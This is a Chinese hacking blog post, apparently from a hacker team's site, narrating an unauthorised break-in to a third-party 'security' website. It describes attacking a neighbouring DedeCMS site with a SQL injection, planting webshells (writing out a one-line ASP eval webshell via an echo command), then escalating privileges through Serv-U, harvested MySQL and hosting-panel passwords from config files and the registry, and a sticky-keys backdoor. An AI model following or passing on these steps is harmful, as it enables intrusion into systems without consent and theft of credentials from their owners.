精选国内外互联网行业最新文章及报告,让网友获得最新的海内外互联网动态
当前位置:主页 > 互联网 > 网络安全 >

对某安全站的艰难提权

2015-01-20 11:44 来源: 编辑:admin
作者:艾尼路  @ 暗影技术团队 www.anying.org  转载请注明,否则追究到底。

今天别人给我发了个站,是个安全站,虽然不是很活跃的站吧,还是值得一试的。

 目标站是discuz x2.5的  明显没漏洞,直接旁。。同ip下大概40左右个站吧。。找到一个站。 一看绿色的框就感觉八成是织梦了。网站后面加个dede 找到默认后台,一看是5.7的,data/admin/ver.txt查看一下日期,用那个搜索注入0day秒杀了吧

进后台拿shell就不用我说了吧,直接写php一句话到网站先上asp大马看下组建,WS写着叉子,好吧。。然后看下可写目录,翻了半天终于找到个 C:\wmpub查看下 asp.net, php都支持,直接换aspx马Set 命令能执行

Ipconfig net user 什么命令都不行,看一下iis_spy也被禁了。目标是那个黑客站,所以我先试试跨目录 转到目标站, 在连接后加个 uc_server/control/admin/db.php  爆出物理路径 
试着copy 一句话进去, 执行 echo ^<%execute(request("cmd"))%^> >>D:\web\xxxxxx\wwwroot\config\ky1235.php  命令执行成功了,可是一句话连不上。。 于是直接用 copy命令拷贝小马到目标路径 成功执行,上大马,目标站拿下

既然拿下了,那就试试提权吧。。  先看看端口端口开着挺多的。。

能读注册表,先看下终端  端口是3884既然能执行cmd命令,当然先试试溢出了。 换aspx马。。Pr,烤肉什么的都试过了,没有回显。。Systeminfo一看,补丁打了413个,溢出估计不行。换个思路,既然开了43958,试试serv-u直接提权,和suFTP,失败。。 应该是密码换了。下一个思路,用set命令爆出mysql路径,菜刀一连能跨目录,到mysql路径data文件里的user配置文件里面直接查root的密码。。。  能解密。。。 感觉应该拿下没问题了,直接丢给永恒用root提权。   结果导出失败。。。 好吧再下一个思路,翻翻注册表,看看有没有敏感信息。。一看到注册表里有这么个键值眼睛都亮了

直接用华众主机的提权方法找到mysql密码,没用了已经。。 一看mssqlpss那栏是空的,想起来了,根本就没开1433端口,我猜可能就没有sa。。 解出来了mastersvrpass 可是连不上。。好吧。。。突然想起来serv-u的路径还不知道,我看华众主机的路径是        D:\Server_Core\hzhost会不会serv-u也在这个路径下呢,于是文件管理器看下,权限不够,无法浏览。。在cmd下用dir 成功查看, 一看乐了,serv-u就在server_core目录下,直接查看配置文件,用里面的密码试着连接su exp ,真成功了。。 直接添加账号密码进去,一看傻了,被禁用了。。

试另一个账号,依然被禁用。。。。



这怎么可能呢。。 难道管理员不远程管理他吗。。 不解中。于是想到了shift后门,永恒用su exp执行之后,成功搞定。。其实用管理员的账号密码连上 ftp 具有写权限,可以直接传木马过去执行,可是手头没有免杀马,所有就放到最后用。 好了,没什么技术含量,可能有点儿错误的地方,大牛勿喷。
标签
你喜欢的文章
返回首页
扫描微信
返回顶部